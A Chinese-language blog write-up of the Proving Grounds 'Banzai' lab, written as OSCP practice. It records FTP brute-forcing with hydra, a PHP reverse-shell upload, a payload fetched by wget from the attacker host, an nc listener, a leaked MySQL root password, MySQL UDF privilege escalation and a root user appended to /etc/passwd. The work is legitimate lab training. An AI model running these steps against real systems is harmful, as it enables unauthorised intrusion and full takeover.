Proving Grounds Practice-Banzai

admin 2024年9月28日11:58:18评论6 views字数 19164阅读63分52秒阅读模式

前言

在未来将会持续更新Proving Grounds Practice内的靶机Write Up,近期本人也通过了OSCP考试,所以将打靶的所有笔记共享出来,所有的靶机推荐来源于以下链接: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159
不过其中有一些机器已经不在Proving Grounds Practice中了,所以就没有了Write Up,本系列将有大约40台左右的机器,如果你在练习过程中遇到了困难,建议先自己进行挖掘,然后再查看Write Up,始终需要记得:Try Harder。

本文结构

一般来说本系列的Write Up将以以下的结构来进行

  1. 端口扫描
  2. 网页枚举或端口枚举
  3. 突破入口
  4. 特权提升

靶机名称 Banzai | 难度:Intermediate

端口枚举

┌──(aaron㉿aacai)-[~/Desktop/Script/nmapAutomator]
└─$ sudo nmap -p21,22,25,5432,8080,8295 -A -Pn 192.168.241.56 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-11 06:52 +0330
Nmap scan report for 192.168.241.56
Host is up (0.26s latency).

PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 3.0.3
22/tcp   open  ssh        OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 ba:3f:68:15:28:86:36:49:7b:4a:84:22:68:15:cc:d1 (RSA)
|   256 2d:ec:3f:78:31:c3:d0:34:5e:3f:e7:6b:77:b5:61:09 (ECDSA)
|_  256 4f:61:5c:cc:b0:1f:be:b4:eb:8f:1c:89:71:04:f0:aa (ED25519)
25/tcp   open  smtp       Postfix smtpd
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after:  2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: banzai.offseclabs.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
5432/tcp open  postgresql PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.19
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after:  2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http       Apache httpd 2.4.25
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.25 (Debian)
8295/tcp open  http       Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Banzai

基本信息

PostgreSQL

┌──(aaron㉿aacai)-[~/Desktop/Script]
└─$ psql -U postgres -h 192.168.241.56 
psql: error: connection to server at "192.168.241.56", port 5432 failed: FATAL:  no pg_hba.conf entry for host "192.168.45.238", user "postgres", database "postgres", SSL on
connection to server at "192.168.241.56", port 5432 failed: FATAL:  no pg_hba.conf entry for host "192.168.45.238", user "postgres", database "postgres", SSL off

8080端口

┌──(aaron㉿aacai)-[~/Desktop/Script]
└─$ feroxbuster --url "http://192.168.241.56:8080"                                 
[####################] - 4m     30000/30000   0s      found:0       errors:111    
[####################] - 4m     30000/30000   114/s   http://192.168.241.56:8080/    

8295端口

[~/Desktop/Script]
└─$ feroxbuster --url "http://192.168.241.56:8295" 
[####################] - 3m     30141/30141   0s      found:58      errors:9      
[####################] - 3m     30000/30000   163/s   http://192.168.241.56:8295/ 
[####################] - 1s     30000/30000   51903/s http://192.168.241.56:8295/css/ => Directory listing
[####################] - 6s     30000/30000   5087/s  http://192.168.241.56:8295/lib/ => Directory listing
[####################] - 6s     30000/30000   5338/s  http://192.168.241.56:8295/lib/easing/ => Directory listing
[####################] - 6s     30000/30000   5336/s  http://192.168.241.56:8295/lib/bootstrap/ => Directory listing
[####################] - 7s     30000/30000   4415/s  http://192.168.241.56:8295/lib/bootstrap/css/ => Directory listing
[####################] - 6s     30000/30000   5350/s  http://192.168.241.56:8295/contactform/ => Directory listing
[####################] - 1s     30000/30000   54645/s http://192.168.241.56:8295/lib/font-awesome/ => Directory listing
[####################] - 1s     30000/30000   54250/s http://192.168.241.56:8295/js/ => Directory listing
[####################] - 3s     30000/30000   9208/s  http://192.168.241.56:8295/lib/font-awesome/fonts/ => Directory listing
[####################] - 2s     30000/30000   17162/s http://192.168.241.56:8295/lib/font-awesome/css/ => Directory listing
[####################] - 4s     30000/30000   7296/s  http://192.168.241.56:8295/img/ => Directory listing
[####################] - 2s     30000/30000   19737/s http://192.168.241.56:8295/img/portfolio/ => Directory listing
[####################] - 1s     30000/30000   52448/s http://192.168.241.56:8295/lib/superfish/ => Directory listing
[####################] - 1s     30000/30000   35800/s http://192.168.241.56:8295/lib/animate/ => Directory listing
[####################] - 1s     30000/30000   26293/s http://192.168.241.56:8295/lib/bootstrap/js/ => Directory listing
[####################] - 1s     30000/30000   54446/s http://192.168.241.56:8295/lib/jquery/ => Directory listing
[####################] - 1s     30000/30000   53667/s http://192.168.241.56:8295/lib/wow/ => Directory listing
[####################] - 1s     30000/30000   53957/s http://192.168.241.56:8295/lib/waypoints/ => Directory listing
[####################] - 1s     30000/30000   54545/s http://192.168.241.56:8295/lib/counterup/ => Directory listing 

通过目录扫描没发现有效的登录地址或者入口

21端口

无法使用Anonymous登录, 尝试使用 hydra 来暴力破解.

[~/Desktop/Script]
└─$ hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.241.56 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-11 07:06:26
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://192.168.241.56:21/
[21][ftp] host: 192.168.241.56   login: admin   password: admin

admin:admin 是有效的一个账号密码

突破边界

[~/Desktop/Script]
└─$ ftp 192.168.241.56                             
Connected to 192.168.241.56.
Name (192.168.241.56:aaron):admin
331 Please specify the password.
Password: 
230 Login successful.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> dir
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     0            4096 May 26  2020 contactform
drwxr-xr-x    2 1001     0            4096 May 26  2020 css
drwxr-xr-x    3 1001     0            4096 May 26  2020 img
-rw-r--r--    1 1001     0           23364 May 27  2020 index.php
drwxr-xr-x    2 1001     0            4096 May 26  2020 js
drwxr-xr-x   11 1001     0            4096 May 26  2020 lib
226 Directory send OK.

我可以使用admin账号去登录ftp, 并且能够看到里面的内容是来自8295端口的列表, 所以在这里我尝试上传php-reverse-shell.php到此文件夹

Proving Grounds Practice-Banzai

┌──(aaron㉿aacai)-[~/Desktop/Script]
└─$ mousepad php-reverse-shell.php 
                                                                                                               
┌──(aaron㉿aacai)-[~/Desktop/Script]
└─$ ftp 192.168.241.56            
Connected to 192.168.241.56.
220 (vsFTPd 3.0.3)
Name (192.168.241.56:aaron): admin
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> cd img
250 Directory successfully changed.
ftp> put php-reverse-shell.php 
local: php-reverse-shell.php remote: php-reverse-shell.php
200 EPRT command successful. Consider using EPSV.
150 Ok to send data.
100% |******************************************************************|  5496       84.53 MiB/s    00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (10.61 KiB/s)
ftp> 

把文件上传到ftp目录之后, 在网页访问就可以看到此文件了.

Proving Grounds Practice-Banzai

点击php文件之后就可以获得到反弹shell

Proving Grounds Practice-Banzai

提权

信息收集

═══════════════════════════════╣ Basic information ╠═══════════════════════════════
OS: Linux version 4.9.0-12-amd64 ([email protected]) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.210-1 (2020-01-20)
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: banzai
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)                                                                                                                 
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)  

══════════════════════════════╣ System Information ╠══════════════════════════════ 
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits                                                        
Linux version 4.9.0-12-amd64 ([email protected]) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.210-1 (2020-01-20)
Distributor ID: Debian
Description:    Debian GNU/Linux 9.12 (stretch)
Release:        9.12
Codename:       stretch

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version                                                           
Sudo version 1.8.19p1 

╔══════════╣ Users with console
banzai:x:1000:1000:Banzai,,,:/home/banzai:/bin/bash                                                                                       
postgres:x:111:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                    
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=1000(banzai) gid=1000(banzai) groups=1000(banzai),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
uid=1001(admin) gid=1001(admin) groups=1001(admin)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(Debian-exim) gid=109(Debian-exim) groups=109(Debian-exim)
uid=106(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=108(ftp) gid=113(ftp) groups=113(ftp)
uid=109(mysql) gid=114(mysql) groups=114(mysql)
uid=110(postfix) gid=115(postfix) groups=115(postfix)
uid=111(postgres) gid=117(postgres) groups=117(postgres),112(ssl-cert)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)


╔══════════╣ Useful software
/usr/bin/base64                                                                                                                           
/usr/bin/gcc
/bin/nc
/bin/nc.traditional
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget


╔══════════╣ MySQL version
mysql  Ver 14.14 Distrib 5.7.30, for Linux (x86_64) using  EditLine wrapper                                                               


═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No                                                                                
═╣ MySQL connection using root/NOPASS ................. No                                                                                
                                                                                                                                          
╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user=root                                                                           
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/


╔══════════╣ Analyzing PostgreSQL Files (limit 70)
Version: psql (PostgreSQL) 9.6.17                                                                                                         

-rw-r----- 1 postgres postgres 4641 Jun  5  2020 /etc/postgresql/9.6/main/pg_hba.conf

-rw-r--r-- 1 postgres postgres 22716 Jun  5  2020 /etc/postgresql/9.6/main/postgresql.conf
log_timezone = 'America/New_York'
stats_temp_directory = '/var/run/postgresql/9.6-main.pg_stat_tmp'
datestyle = 'iso, mdy'
timezone = 'America/New_York'
default_text_search_config = 'pg_catalog.english'
-rw-r--r-- 1 root root 176 Nov 12  2019 /usr/lib/tmpfiles.d/postgresql.conf
d /var/run/postgresql 2775 postgres postgres - -
d /var/log/postgresql 1775 root postgres - -

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
-rw-r--r--  1 admin root 23364 May 27  2020 index.php                                                                                     
-rw-r--r-- 1 admin root 135 May 26  2020 /var/www/config.php
drwxr-xr-x  2 admin root  4096 May 26  2020 contactform
drwxr-xr-x  2 admin root  4096 May 26  2020 css
drwxr-xr-x  2 admin root  4096 May 26  2020 js
drwxr-xr-x  3 admin root  4096 Aug 10 23:46 img
drwxr-xr-x 11 admin root  4096 May 26  2020 lib
total 44

可以看到www目录下的config.php文件, 并且能够知道mysql的密码.

cat /var/www/config.php
<?php
define('DBHOST''127.0.0.1');
define('DBUSER''root');
define('DBPASS''EscalateRaftHubris123');
define('DBNAME''main');
?>

在靶机上尝试登录, 能够成功.

www-data@banzai:/tmp$ mysql -uroot -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or g.
Your MySQL connection id is 7
Server version: 5.7.30 MySQL Community Server (GPL)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.

mysql> 
mysql> exit
Bye

由于我拿到的用户是root账号, 那么接下来尝试使用MySQL的UDF提权

源代码可以参考以下 :

https://www.exploit-db.com/exploits/1518

或者

https://www.exploit-db.com/exploits/1181

首先编译c语言文件

ww-data@banzai:/tmp$ wget 192.168.45.238:22/raptor_udf2.c
www-data@banzai:/tmp$ gcc -g -c raptor_udf2.c
gcc -g -c raptor_udf2.c
www-data@banzai:/tmp$ ls                                                          
raptor_udf2.c  raptor_udf2.o
www-data@banzai:/tmp$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
<,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
www-data@banzai:/tmp$ ls
ls
raptor_udf2.c  raptor_udf2.o  raptor_udf2.so

登录到mysql执行以下操作

use mysql;
create table foo(line blob);
insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
select * from mysql.func;
select do_system('chmod 777 /etc/passwd');

但是按照上面的顺序下来之后发现出现了报错

www-data@banzai:/tmp$ mysql -uroot -p
Welcome to the MySQL monitor. Commands end with ; or g.
mysql> use mysql;
use mysql;
Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)

mysql> insert into foo values(load_file('/tmp/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
ERROR 1126 (HY000): Can't open shared library 'raptor_udf2.so' (errno: 11 /usr/lib/mysql/plugin/raptor_udf2.so: file too short)

报错的原因是文件太小, 在google上面搜索之后可能是因为文件权限的原因, 在本地使用chmod无果之后, 我想到了在ftp上修改文件权限, 最终它是有效的.

[~/Desktop/Script/mysql]
└─$ gcc -g -c raptor_udf2.c                                                      
                                                                                                               
[~/Desktop/Script/mysql]
└─$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
                                                                                                               
[~/Desktop/Script/mysql]
└─$ ls
raptor_udf2.c  raptor_udf2.o  raptor_udf2.so
                                                                                                               
[~/Desktop/Script/mysql]
└─$ ftp 192.168.241.56
Connected to 192.168.241.56.

ftp> user admin
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> put raptor_udf2.so
local: raptor_udf2.so remote: raptor_udf2.so
200 EPRT command successful. Consider using EPSV.
ch150 Ok to send data.
ftp> chmod 777 raptor_udf2.so
200 SITE CHMOD command ok.
ftp> exit
221 Goodbye.

再次尝试去使用MySQL udf提权

[~/Desktop/pg/banzai]
└─$ sudo nc -lvnp 22
listening on [any] 22 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.241.56] 58692

www-data@banzai:/var/www/html$ ls
ls
contactform  css  img  index.php  js  lib  raptor_udf2.so
www-data@banzai:/var/www/html$ pwd
pwd
/var/www/html

现在可以看到so文件在/var/www/html目录下, 再次连接到 mysql

mysql> use mysql;
use mysql;
Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.02 sec)

mysql> insert into foo values(load_file('/var/www/html/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
Query OK, 1 row affected (0.01 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name | ret | dl | type |
+-----------+-----+----------------+----------+
| do_system | 2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('chmod 777 /etc/passwd');
+------------------------------------+
| do_system('chmod 777 /etc/passwd') |
+------------------------------------+
| 0 |
+------------------------------------+


最终使用mysql成功写入密码到/etc/passwd里面, 得到root权限

www-data@banzai:/var/www/html$ openssl passwd aaron
iNw1w7ZwlvoYw
www-data@banzai:/var/www/html$ echo "aaron2:iNw1w7ZwlvoYw:0:0::/root/:/bin/bash" >> /etc/passwd
www-data@banzai:/var/www/html$ su aaron2
Password: aaron
root@banzai:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@banzai:/var/www/html# cat /root/proof.txt
ed9406a4dce49f83e3d61e476c75c8f2

END

OSCP(Offensive Security Certified Professional),中文称国际注册渗透测试专家认证,是由Offensive Security推出的200等级的证书,主要面向领域:渗透测试。
OSCP 证书是一种技术性证书,涵盖渗透测试和攻击技术方面。持有此证书的人员已通过对目标网络进行渗透测试并获得管理员访问权限的实际考试。该证书是由 Offense Security 出品,考试内容涉及网络渗透测试、漏洞挖掘、漏洞利用等方面。OSCP 考试难度较高,需要实际的技能和经验,持有此证书可证明持有人具有深入了解渗透测试及相关攻击技术的实际能力。

如果你觉得本篇文章对你有帮助,点个关注好不好呢,还可以点个在看,感谢你的支持:)))))))))))))

联系我

WeChat ID:wengchensmile
Email Address: [email protected](个人)

原文始发于微信公众号(Aaron与安全的那些事):Proving Grounds Practice-Banzai

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日11:58:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Proving Grounds Practice-Banzaihttps://cn-sec.com/archives/1993768.html

发表评论

匿名网友 填写信息